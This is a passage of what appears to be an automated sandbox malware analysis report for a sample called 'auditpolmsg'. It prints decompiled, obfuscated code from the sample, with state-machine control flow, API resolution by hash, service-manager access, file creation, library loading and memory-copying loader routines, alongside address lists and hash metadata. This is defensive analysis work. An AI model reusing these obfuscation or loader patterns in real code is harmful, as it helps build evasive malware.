                                                        								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
                                                        								_t28 = 0xc471eb;
                                                        							}
                                                        							continue;
                                                        						} else {
                                                        							_t98 = _t28 - 0x9835f84;
                                                        							if(_t98 > 0) {
                                                        								__eflags = _t28 - 0xc0f0991;
                                                        								if(_t28 != 0xc0f0991) {
                                                        									goto L36;
                                                        								} else {
                                                        									_t69 =  *0x36dbd8;
                                                        									__eflags = _t69;
                                                        									if(_t69 == 0) {
                                                        										_t69 = E00363E60(_t64, E00363F00(0xd9518805), 0x141622d6, _t94);
                                                        										 *0x36dbd8 = _t69;
                                                        									}
                                                        									_t53 =  *0x36e54c; // 0x5ce050
                                                        									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
                                                        									__eflags = _t56;
                                                        									_t28 = 0x9835f84;
                                                        									_t64 =  ==  ? _t94 : _t64;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t98 == 0) {
                                                        									E00367C60(_t94);
                                                        									_t28 = 0x6addd5c;
                                                        									continue;
                                                        								} else {
                                                        									if(_t28 == 0xc471eb) {
                                                        										_v528 = 0xc1a3;
                                                        										_t28 = 0x179ed98e;
                                                        										_v528 = _v528 + 0xffff1ad7;
                                                        										_v528 = _v528 ^ 0xffffdc53;
                                                        										continue;
                                                        									} else {
                                                        										if(_t28 != 0x6addd5c) {
                                                        											goto L36;
                                                        										} else {
                                                        											_t60 =  *0x36e3f4;
                                                        											if(_t60 == 0) {
                                                        												_t60 = E00363E60(_t64, E00363F00(0x9bab0b12), 0x7dc9b9bb, _t94);
                                                        												 *0x36e3f4 = _t60;
                                                        											}
                                                        											 *_t60(0,  &_v524, 0x104);
                                                        											_t62 = E00363D00( &_v536);
                                                        											_t72 =  *0x36e54c; // 0x5ce050
                                                        											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
                                                        											_t28 = 0x39ea8110;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L42:
                                                        					}
                                                        					__eflags = _t28 - 0x29f9e503;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t28 - 0x39ea8110;
                                                        						if(_t28 == 0x39ea8110) {
                                                        							_t29 =  *0x36dbd8;
                                                        							__eflags = _t29;
                                                        							if(_t29 == 0) {
                                                        								_t29 = E00363E60(_t64, E00363F00(0xd9518805), 0x141622d6, _t94);
                                                        								 *0x36dbd8 = _t29;
                                                        							}
                                                        							 *_t29(0, 0x25, 0, 0,  &_v524);
                                                        							_t31 =  *0x36e54c; // 0x5ce050
                                                        							_t32 = _t31 + 0x234;
                                                        							__eflags = _t31 + 0x234;
                                                        							E00363040(_t32);
                                                        							goto L41;
                                                        						} else {
                                                        							goto L36;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							_t37 =  *0x36e494;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E00363E60(_t64, E00363F00(0x9bab0b12), 0x7facde30, _t94);
                                                        								 *0x36e494 = _t37;
                                                        							}
                                                        							_t93 =  *_t37();
                                                        							_t39 =  *0x36dd18;
                                                        							__eflags = _t39;
                                                        							if(_t39 == 0) {
                                                        								_t39 = E00363E60(_t64, E00363F00(0x9bab0b12), 0x9ff0609c, _t94);
                                                        								 *0x36dd18 = _t39;
                                                        							}
                                                        							_t40 =  *_t39(_t93, 8, 0x480);
                                                        							 *0x36e54c = _t40;
                                                        							__eflags = _t40;
                                                        							if(_t40 == 0) {
                                                        								L41:
                                                        								return _t64;
                                                        							} else {
                                                        								 *((intOrPtr*)(_t40 + 4)) = E00367E40;
                                                        								_t28 = 0x13fee53b;
                                                        								goto L1;
                                                        							}
                                                        						} else {
                                                        							__eflags = _t28 - 0x179ed98e;
                                                        							if(_t28 == 0x179ed98e) {
                                                        								__eflags =  *0x36e18c;
                                                        								if( *0x36e18c == 0) {
                                                        									 *0x36e18c = E00363E60(_t64, E00363F00(0x26f5757c), 0x268fe5f0, _t94);
                                                        								}
                                                        								CloseServiceHandle(_t92); // executed
                                                        								_t28 = 0xc0f0991;
                                                        								goto L1;
                                                        							} else {
                                                        								__eflags = _t28 - 0x23c48583;
                                                        								if(_t28 != 0x23c48583) {
                                                        									goto L36;
                                                        								} else {
                                                        									_v528 = 0x5332;
                                                        									_v528 = _v528 << 6;
                                                        									_v528 = _v528 >> 0xf;
                                                        									_v528 = _v528 + 0xffffb18f;
                                                        									_v528 = _v528 >> 3;
                                                        									_v528 = _v528 ^ 0x1ffff62b;
                                                        									_t47 =  *0x36e54c; // 0x5ce050
                                                        									 *((intOrPtr*)(_t47 + 8)) = 0x367e30;
                                                        									_t28 = 0xc0f0991;
                                                        									goto L1;
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L42;
                                                        					L36:
                                                        					__eflags = _t28 - 0x305b3459;
                                                        				} while (_t28 != 0x305b3459);
                                                        				return _t64;
                                                        				goto L42;
                                                        			}






























                                                        0x00369868
                                                        0x0036986a
                                                        0x00369871
                                                        0x00369875
                                                        0x00369875
                                                        0x00369878
                                                        0x00369880
                                                        0x00369880
                                                        0x00369880
                                                        0x00369880
                                                        0x00369885
                                                        0x00000000
                                                        0x00000000
                                                        0x0036988b
                                                        0x00369993
                                                        0x00369995
                                                        0x003699ad
                                                        0x003699ad
                                                        0x003699bb
                                                        0x003699bd
                                                        0x003699bf
                                                        0x003699c1
                                                        0x003699d8
                                                        0x003699c3
                                                        0x003699c3
                                                        0x003699c8
                                                        0x003699ce
                                                        0x003699ce
                                                        0x00000000
                                                        0x00369891
                                                        0x00369891
                                                        0x00369896
                                                        0x00369936
                                                        0x0036993b
                                                        0x00000000
                                                        0x00369941
                                                        0x00369941
                                                        0x00369947
                                                        0x00369949
                                                        0x00369961
                                                        0x00369963
                                                        0x00369963
                                                        0x00369969
                                                        0x0036997d
                                                        0x0036997f
                                                        0x00369981
                                                        0x00369986
                                                        0x00000000
                                                        0x00369986
                                                        0x0036989c
                                                        0x0036989c
                                                        0x00369927
                                                        0x0036992c
                                                        0x00000000
                                                        0x003698a2
                                                        0x003698a7
                                                        0x00369905
                                                        0x0036990d
                                                        0x00369912
                                                        0x0036991a
                                                        0x00000000
                                                        0x003698a9
                                                        0x003698ae
                                                        0x00000000
                                                        0x003698b4
                                                        0x003698b4
                                                        0x003698bb
                                                        0x003698ce
                                                        0x003698d3
                                                        0x003698d3
                                                        0x003698e4
                                                        0x003698ea
                                                        0x003698ef
                                                        0x003698f5
                                                        0x003698fb
                                                        0x00000000
                                                        0x003698fb
                                                        0x003698ae
                                                        0x003698a7
                                                        0x0036989c
                                                        0x00369896
                                                        0x00000000
                                                        0x0036988b
                                                        0x003699e2
                                                        0x003699e7
                                                        0x00369ae3
                                                        0x00369ae8
                                                        0x00369b02
                                                        0x00369b07
                                                        0x00369b09
                                                        0x00369b1c
                                                        0x00369b21
                                                        0x00369b21
                                                        0x00369b33
                                                        0x00369b35
                                                        0x00369b3e
                                                        0x00369b3e
                                                        0x00369b44
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003699ed
                                                        0x003699ed
                                                        0x00369a73
                                                        0x00369a78
                                                        0x00369a7a
                                                        0x00369a8d
                                                        0x00369a92
                                                        0x00369a92
                                                        0x00369a99
                                                        0x00369a9b
                                                        0x00369aa0
                                                        0x00369aa2
                                                        0x00369ab5
                                                        0x00369aba
                                                        0x00369aba
                                                        0x00369ac7
                                                        0x00369ac9
                                                        0x00369ace
                                                        0x00369ad0
                                                        0x00369b4f
                                                        0x00369b58
                                                        0x00369ad2
                                                        0x00369ad2
                                                        0x00369ad9
                                                        0x00000000
                                                        0x00369ad9
                                                        0x003699f3
                                                        0x003699f3
                                                        0x003699f8
                                                        0x00369a47
                                                        0x00369a49
                                                        0x00369a61
                                                        0x00369a61
                                                        0x00369a67
                                                        0x00369a69
                                                        0x00000000
                                                        0x003699fa
                                                        0x003699fa
                                                        0x003699ff
                                                        0x00000000
                                                        0x00369a05
                                                        0x00369a05
                                                        0x00369a0d
                                                        0x00369a12
                                                        0x00369a17
                                                        0x00369a1f
                                                        0x00369a24
                                                        0x00369a2c
                                                        0x00369a31
                                                        0x00369a38
                                                        0x00000000
                                                        0x00369a38
                                                        0x003699ff
                                                        0x003699f8
                                                        0x003699ed
                                                        0x00000000
                                                        0x00369aea
                                                        0x00369aea
                                                        0x00369aea
                                                        0x00369b01
                                                        0x00000000

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,005CE038), ref: 0036997D
                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 003699BB
                                                        • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 00369A67
                                                        • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 00369B33
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, Offset: 00360000, based on PE: true
                                                        • Associated: 00000008.00000002.2262072575.0000000000360000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262091089.000000000036D000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262100168.000000000036F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_360000_auditpolmsg.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPath$CloseHandleManagerOpenService
                                                        • String ID: 2S$P\$Y4[0
                                                        • API String ID: 2382770032-2732765257
                                                        • Opcode ID: 494f50d63a58f4f8e03af9685cced662594b3c1875e360dacc74558e5a2b24ea
                                                        • Instruction ID: 29038fc1cabb7cdf5e554dca5db43a13aad79c4fc9537fcecbf75e3b79c14f09
                                                        • Opcode Fuzzy Hash: 494f50d63a58f4f8e03af9685cced662594b3c1875e360dacc74558e5a2b24ea
                                                        • Instruction Fuzzy Hash: E761E535B042059BEB1AAF68EC8576A32DDDBA1704F11C42EF105DF359EBB0CD0987A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 105 368400-3684df 106 3684e3-3684e9 105->106 107 3684ef 106->107 108 3685c8-3685ce 106->108 109 3684f5-3684fb 107->109 110 36866c-3686b4 call 36b6e0 107->110 111 368630-368637 108->111 112 3685d0-3685d6 108->112 116 3684fd-368503 109->116 117 36854a-368551 109->117 128 3685bd-3685c7 110->128 131 3686ba 110->131 114 368654-368667 111->114 115 368639-36864f call 363f00 call 363e60 111->115 118 3685b1-3685b7 112->118 119 3685d8-3685e0 112->119 114->106 115->114 120 368505-36850b 116->120 121 368543-368548 116->121 126 368553-368569 call 363f00 call 363e60 117->126 127 36856e-368591 117->127 118->106 118->128 122 3685e2-3685fa call 363f00 call 363e60 119->122 123 368600-368624 CreateFileW 119->123 120->118 129 368511-368518 120->129 121->106 122->123 123->128 132 368626-36862b 123->132 126->127 146 368593-3685a9 call 363f00 call 363e60 127->146 147 3685ae 127->147 136 368535-368541 129->136 137 36851a-368530 call 363f00 call 363e60 129->137 140 3686c4-3686d1 131->140 141 3686bc-3686be 131->141 132->106 136->106 137->136 141->128 141->140 146->147 147->118
                                                        C-Code - Quality: 66%
                                                        			E00368400(void* __ebx, void* __ebp) {
                                                        				short _v524;
                                                        				char _v564;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				signed int _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				intOrPtr _v596;
                                                        				intOrPtr* _t75;
                                                        				intOrPtr* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t92;
                                                        				intOrPtr* _t93;
                                                        				void* _t95;
                                                        				void* _t97;
                                                        				void* _t98;
                                                        				void* _t99;
                                                        				void* _t100;
                                                        				void* _t101;
                                                        				signed int _t119;
                                                        				void* _t121;
                                                        				void* _t122;
                                                        				signed int _t123;
                                                        				intOrPtr _t124;
                                                        				void* _t126;
                                                        				void* _t129;
                                                        
                                                        				_t126 = __ebp;
                                                        				_t101 = __ebx;
                                                        				_v584 = 0xdbec;
                                                        				_v584 = _v584 + 0xa437;
                                                        				_v584 = _v584 | 0x0afcf5fb;
                                                        				_v584 = _v584 ^ 0x9493ba05;
                                                        				_v584 = _v584 >> 0xc;
                                                        				_v584 = _v584 >> 0xb;
                                                        				_v584 = _v584 ^ 0x000001bc;
                                                        				_v592 = 0x7d19;
                                                        				_v592 = _v592 << 9;
                                                        				_v592 = _v592 >> 0xe;
                                                        				_v592 = _v592 + 0xffff07e5;
                                                        				_v592 = _v592 | 0x8aea6eef;
                                                        				_v592 = _v592 + 0xd867;
                                                        				_v592 = _v592 + 0x9c41;
                                                        				_v592 = _v592 + 0x3de0;
                                                        				_v592 = _v592 + 0x218b;
                                                        				_v592 = _v592 ^ 0x00014403;
                                                        				_v588 = 0x2591;
                                                        				_t123 = 0x4a20241;
                                                        				_v588 = _v588 * 0x7d;
                                                        				_v588 = _v588 + 0x8d68;
                                                        				_v588 = _v588 + 0xffff8911;
                                                        				_v588 = _v588 * 0x6a;
                                                        				_v588 = _v588 + 0xffff93d5;
                                                        				_v588 = _v588 ^ 0x07a13cd2;
                                                        				_v580 = 0x789;
                                                        				_v580 = _v580 >> 1;
                                                        				_v580 = _v580 ^ 0xaee58af2;
                                                        				_v580 = _v580 ^ 0xaee58936;
                                                        				_t122 = _v580;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t129 = _t123 - 0x1aed34c4;
                                                        						if(_t129 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t129 == 0) {
                                                        							_v580 = 0xa8c00;
                                                        							_v576 = 0;
                                                        							_v596 = E0036B6E0(_v580, _v576, 0x989680, 0);
                                                        							_v592 = _t119;
                                                        							_t121 = _v588 - _v564;
                                                        							_t124 = _v596;
                                                        							asm("sbb ecx, [esp+0x3c]");
                                                        							__eflags = _v584 - _v592;
                                                        							if(__eflags < 0) {
                                                        								goto L16;
                                                        							} else {
                                                        								if(__eflags > 0) {
                                                        									L29:
                                                        									return 1;
                                                        								} else {
                                                        									__eflags = _t121 - _t124;
                                                        									if(_t121 < _t124) {
                                                        										goto L16;
                                                        									} else {
                                                        										goto L29;
                                                        									}
                                                        								}
                                                        							}
                                                        						} else {
                                                        							if(_t123 == 0x12f5064) {
                                                        								_t82 =  *0x36dec0;
                                                        								__eflags = _t82;
                                                        								if(_t82 == 0) {
                                                        									_t99 = E00363F00(0x9bab0b12);
                                                        									_t119 = 0x8b0c7279;
                                                        									_t82 = E00363E60(_t101, _t99, 0x8b0c7279, _t126);
                                                        									 *0x36dec0 = _t82;
                                                        								}
                                                        								 *_t82(_t122, 0,  &_v564, 0x28);
                                                        								asm("sbb esi, esi");
                                                        								_t85 =  *0x36de3c;
                                                        								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
                                                        								__eflags = _t85;
                                                        								if(_t85 == 0) {
                                                        									_t98 = E00363F00(0x9bab0b12);
                                                        									_t119 = 0x20de7595;
                                                        									_t85 = E00363E60(_t101, _t98, 0x20de7595, _t126);
                                                        									 *0x36de3c = _t85;
                                                        								}
                                                        								 *_t85(_t122);
                                                        								goto L15;
                                                        							} else {
                                                        								if(_t123 == 0x4a20241) {
                                                        									_t123 = 0x33602029;
                                                        									continue;
                                                        								} else {
                                                        									if(_t123 != 0xd59c266) {
                                                        										goto L15;
                                                        									} else {
                                                        										_t93 =  *0x36e1d4;
                                                        										if(_t93 == 0) {
                                                        											_t97 = E00363F00(0x9bab0b12);
                                                        											_t119 = 0xa229df38;
                                                        											_t93 = E00363E60(_t101, _t97, 0xa229df38, _t126);
                                                        											 *0x36e1d4 = _t93;
                                                        										}
                                                        										 *_t93( &_v572);
                                                        										_t123 = 0x1aed34c4;
                                                        										continue;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t123 - 0x33602029;
                                                        					if(_t123 == 0x33602029) {
                                                        						_t75 =  *0x36e3f4;
                                                        						__eflags = _t75;
                                                        						if(_t75 == 0) {
                                                        							_t100 = E00363F00(0x9bab0b12);
                                                        							_t119 = 0x7dc9b9bb;
                                                        							_t75 = E00363E60(_t101, _t100, 0x7dc9b9bb, _t126);
                                                        							 *0x36e3f4 = _t75;
                                                        						}
                                                        						 *_t75(0,  &_v524, 0x104);
                                                        						_t123 = 0x3ae77736;
                                                        						goto L1;
                                                        					} else {
                                                        						__eflags = _t123 - 0x3ae77736;
                                                        						if(_t123 != 0x3ae77736) {
                                                        							goto L15;
                                                        						} else {
                                                        							__eflags =  *0x36de04;
                                                        							if( *0x36de04 == 0) {
                                                        								_t95 = E00363F00(0x9bab0b12);
                                                        								_t119 = 0xb66d748a;
                                                        								 *0x36de04 = E00363E60(_t101, _t95, 0xb66d748a, _t126);
                                                        							}
                                                        							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
                                                        							_t122 = _t92;
                                                        							__eflags = _t122 - 0xffffffff;
                                                        							if(_t122 == 0xffffffff) {
                                                        								break;
                                                        							} else {
                                                        								_t123 = 0x12f5064;
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L30;
                                                        					L15:
                                                        					__eflags = _t123 - 0x13ef6fdf;
                                                        				} while (_t123 != 0x13ef6fdf);
                                                        				L16:
                                                        				__eflags = 0;
                                                        				return 0;
                                                        				goto L30;
                                                        			}






























                                                        0x00368400
                                                        0x00368400
                                                        0x00368406
                                                        0x0036840e
                                                        0x00368416
                                                        0x0036841e
                                                        0x00368426
                                                        0x0036842b
                                                        0x00368430
                                                        0x00368438
                                                        0x00368440
                                                        0x00368445
                                                        0x0036844a
                                                        0x00368452
                                                        0x0036845a
                                                        0x00368462
                                                        0x0036846a
                                                        0x00368472
                                                        0x0036847a
                                                        0x00368482
                                                        0x00368491
                                                        0x00368496
                                                        0x0036849a
                                                        0x003684a2
                                                        0x003684af
                                                        0x003684b3
                                                        0x003684bb
                                                        0x003684c3
                                                        0x003684cb
                                                        0x003684cf
                                                        0x003684d7
                                                        0x003684df
                                                        0x003684df
                                                        0x003684e3
                                                        0x003684e3
                                                        0x003684e3
                                                        0x003684e3
                                                        0x003684e9
                                                        0x00000000
                                                        0x00000000
                                                        0x003684ef
                                                        0x0036866e
                                                        0x00368676
                                                        0x00368696
                                                        0x0036869a
                                                        0x003686a2
                                                        0x003686a6
                                                        0x003686aa
                                                        0x003686b2
                                                        0x003686b4
                                                        0x00000000
                                                        0x003686ba
                                                        0x003686ba
                                                        0x003686c5
                                                        0x003686d1
                                                        0x003686bc
                                                        0x003686bc
                                                        0x003686be
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003686be
                                                        0x003686ba
                                                        0x003684f5
                                                        0x003684fb
                                                        0x0036854a
                                                        0x0036854f
                                                        0x00368551
                                                        0x00368558
                                                        0x0036855d
                                                        0x00368564
                                                        0x00368569
                                                        0x00368569
                                                        0x00368578
                                                        0x0036857c
                                                        0x0036857e
                                                        0x00368589
                                                        0x0036858f
                                                        0x00368591
                                                        0x00368598
                                                        0x0036859d
                                                        0x003685a4
                                                        0x003685a9
                                                        0x003685a9
                                                        0x003685af
                                                        0x00000000
                                                        0x003684fd
                                                        0x00368503
                                                        0x00368543
                                                        0x00000000
                                                        0x00368505
                                                        0x0036850b
                                                        0x00000000
                                                        0x00368511
                                                        0x00368511
                                                        0x00368518
                                                        0x0036851f
                                                        0x00368524
                                                        0x0036852b
                                                        0x00368530
                                                        0x00368530
                                                        0x0036853a
                                                        0x0036853c
                                                        0x00000000
                                                        0x0036853c
                                                        0x0036850b
                                                        0x00368503
                                                        0x003684fb
                                                        0x00000000
                                                        0x003684ef
                                                        0x003685c8
                                                        0x003685ce
                                                        0x00368630
                                                        0x00368635
                                                        0x00368637
                                                        0x0036863e
                                                        0x00368643
                                                        0x0036864a
                                                        0x0036864f
                                                        0x0036864f
                                                        0x00368660
                                                        0x00368662
                                                        0x00000000
                                                        0x003685d0
                                                        0x003685d0
                                                        0x003685d6
                                                        0x00000000
                                                        0x003685d8
                                                        0x003685de
                                                        0x003685e0
                                                        0x003685e7
                                                        0x003685ec
                                                        0x003685fa
                                                        0x003685fa
                                                        0x0036861d
                                                        0x0036861f
                                                        0x00368621
                                                        0x00368624
                                                        0x00000000
                                                        0x00368626
                                                        0x00368626
                                                        0x00000000
                                                        0x00368626
                                                        0x00368624
                                                        0x003685d6
                                                        0x00000000
                                                        0x003685b1
                                                        0x003685b1
                                                        0x003685b1
                                                        0x003685bd
                                                        0x003685bd
                                                        0x003685c7
                                                        0x00000000

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 0036861D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262078055.0000000000361000.00000020.00000001.sdmp, Offset: 00360000, based on PE: true
                                                        • Associated: 00000008.00000002.2262072575.0000000000360000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262091089.000000000036D000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000008.00000002.2262100168.000000000036F000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_360000_auditpolmsg.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID: ) `3$) `3$6w:$6w:$=
                                                        • API String ID: 823142352-4124229693
                                                        • Opcode ID: ef542f2cd287c5cc211985d78d29ac7f8c2653a7e47de03db3a0485975bb4f4b
                                                        • Instruction ID: 385f8e073b52c7ff8b9341fe291350510168216ae810d8c434b0ef6c224d77d9
                                                        • Opcode Fuzzy Hash: ef542f2cd287c5cc211985d78d29ac7f8c2653a7e47de03db3a0485975bb4f4b
                                                        • Instruction Fuzzy Hash: 07611771A083119FC716DF68C85562FBBE5ABE4714F00C91DF5998B2A4DBB4CD098F82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 160 2d0d60-2d0dd5 call 2d0ed0 VirtualAlloc RtlMoveMemory 164 2d0ebe-2d0ec4 160->164 165 2d0ddb-2d0dde 160->165 165->164 166 2d0de4-2d0de6 165->166 166->164 168 2d0dec-2d0df0 166->168 168->164 169 2d0df6-2d0dfd 168->169 170 2d0eaf-2d0ebb 169->170 171 2d0e03-2d0e36 call 2d1140 RtlMoveMemory 169->171 171->164 175 2d0e3c-2d0e4a VirtualAlloc 171->175 176 2d0e4c-2d0e52 175->176 177 2d0e89-2d0ea0 RtlFillMemory 175->177 178 2d0e5a-2d0e68 176->178 179 2d0e54-2d0e56 176->179 177->164 183 2d0ea2-2d0ea5 177->183 178->164 180 2d0e6a-2d0e7d RtlMoveMemory 178->180 179->178 180->164 182 2d0e7f-2d0e83 180->182 182->164 184 2d0e85 182->184 183->164 185 2d0ea7-2d0ea9 183->185 184->177 185->170 185->171
                                                        APIs
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 002D0F08
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 002D0F3E
                                                          • Part of subcall function 002D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 002D0F7F
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 002D0DB4
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 002D0DC3
                                                          • Part of subcall function 002D1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,002D0EFD,00000000), ref: 002D1155
                                                        • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 002D0E11
                                                        • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 002D0E3D
                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 002D0E6C
                                                        • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 002D0E98
                                                        Memory Dump Source
                                                        • Source File: 00000008.00000002.2262052090.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_8_2_2d0000_auditpolmsg.jbxd
                                                        Similarity
                                                        • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                        • String ID:
                                                        • API String ID: 3581289920-0
                                                        • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction ID: 15891d395ebeaa6218be2c9988314ed9f63d1efcc3a7231ab5eab0be654e0aec
                                                        • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                        • Instruction Fuzzy Hash: D531D4B1A143416BD724EB60CC84FAB77E9EBC8381F044D2EB94993361D635DCA1CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 241 367120 242 367125-36712a 241->242 243 3671b4-3671b9 242->243 244 367130 242->244 245 367207-36720c 243->245 246 3671bb 243->246 247 367136-36713b 244->247 248 367233-367248 call 3634c0 244->248 252 367227-36722c 245->252 253 36720e-367222 call 367080 245->253 249 3671ee-367202 call 367080 246->249 250 3671bd-3671c2 246->250 254 367190-367195 247->254 255 36713d 247->255 268 367265-367278 LoadLibraryW 248->268 269 36724a-367260 call 363f00 call 363e60 248->269 249->242 258 3671c4-3671c9 250->258 259 3671d5-3671e9 call 367080 250->259 252->242 264 367232 252->264 253->242 254->252 263 36719b-3671af call 367080 254->263 256 36713f-367144 255->256 257 36717a-36718e call 367080 255->257 265 367146-36714b 256->265 266 367164-367178 call 367080 256->266 257->242 258->252 267 3671cb-3671d0 258->267 259->242 263->242 265->252 275 367151-367162 call 367080 265->275 266->242 267->242 279 367295-3672a0 268->279 280 36727a-367290 call 363f00 call 363e60 268->280 269->268 275->242 291 3672a2-3672b8 call 363f00 call 363e60 279->291 292 3672bd-3672c5 279->292 280->279 291->292
                                                        C-Code - Quality: 85%
                                                        			E00367120(void* __ebx) {
                                                        				void* _t2;
                                                        				struct HINSTANCE__* _t8;
                                                        				intOrPtr* _t9;
                                                        				intOrPtr* _t11;
                                                        				void* _t21;
                                                        				intOrPtr _t23;
                                                        				void* _t48;
                                                        				WCHAR* _t51;
                                                        				void* _t53;
                                                        				void* _t54;
                                                        				void* _t55;
                                                        
                                                        				_t21 = __ebx;
                                                        				_t2 = 0x291da748;
                                                        				goto L1;
                                                        				do {
                                                        					while(1) {
                                                        						L1:
                                                        						_t54 = _t2 - 0x1a8031ec;
                                                        						if(_t54 > 0) {
                                                        							break;
                                                        						}
                                                        						if(_t54 == 0) {
                                                        							_t51 = E003634C0(0x36d830);
                                                        							__eflags =  *0x36dd1c;
                                                        							if( *0x36dd1c == 0) {
                                                        								 *0x36dd1c = E00363E60(_t21, E00363F00(0x9bab0b12), 0xe4b28d97, _t53);
                                                        							}
                                                        							_t8 = LoadLibraryW(_t51);
                                                        							_t23 =  *0x36e548; // 0x607e28
                                                        							 *(_t23 + 0x4c) = _t8;
                                                        							_t9 =  *0x36e494;
                                                        							__eflags = _t9;
                                                        							if(_t9 == 0) {
                                                        								_t9 = E00363E60(_t21, E00363F00(0x9bab0b12), 0x7facde30, _t53);
                                                        								 *0x36e494 = _t9;
                                                        							}
                                                        							_t48 =  *_t9();
                                                        							_t11 =  *0x36df30;
                                                        							__eflags = _t11;
                                                        							if(_t11 == 0) {
                                                        								_t11 = E00363E60(_t21, E00363F00(0x9bab0b12), 0x5010a54d, _t53);
                                                        								 *0x36df30 = _t11;
                                                        							}
                                                        							return  *_t11(_t48, 0, _t51);
                                                        						} else {
                                                        							_t55 = _t2 - 0x185e9846;
                                                        							if(_t55 > 0) {
                                                        								__eflags = _t2 - 0x18843476;
                                                        								if(__eflags != 0) {
                                                        									goto L21;
                                                        								} else {
                                                        									E00367080(_t21, 0x36d7a0, 4, __eflags);
                                                        									_t2 = 0x2eb73d4f;
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								if(_t55 == 0) {
                                                        									E00367080(_t21, 0x36d8f0, 2, __eflags);
                                                        									_t2 = 0x9da2520;
                                                        									continue;
                                                        								} else {
                                                        									if(_t2 == 0x9da2520) {
                                                        										E00367080(_t21, 0x36d800, 3, __eflags);
                                                        										_t2 = 0x18843476;
                                                        										continue;
                                                        									} else {
                                                        										_t57 = _t2 - 0x15a7f569;
                                                        										if(_t2 != 0x15a7f569) {
                                                        											goto L21;
                                                        										} else {
                                                        											E00367080(_t21, 0x36d860, 0, _t57);
                                                        											_t2 = 0x39797244;
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L30:
                                                        					}
                                                        					__eflags = _t2 - 0x2eb73d4f;
                                                        					if(__eflags > 0) {
                                                        						__eflags = _t2 - 0x39797244;
                                                        						if(__eflags != 0) {
                                                        							goto L21;
                                                        						} else {
                                                        							E00367080(_t21, 0x36d890, 1, __eflags);
                                                        							_t2 = 0x185e9846;
                                                        							goto L1;
                                                        						}
                                                        					} else {
                                                        						if(__eflags == 0) {
                                                        							E00367080(_t21, 0x36d7e0, 5, __eflags);
                                                        							_t2 = 0x22a44863;
                                                        							goto L1;
                                                        						} else {
                                                        							__eflags = _t2 - 0x22a44863;
                                                        							if(__eflags == 0) {
                                                        								E00367080(_t21, 0x36d8c0, 6, __eflags);
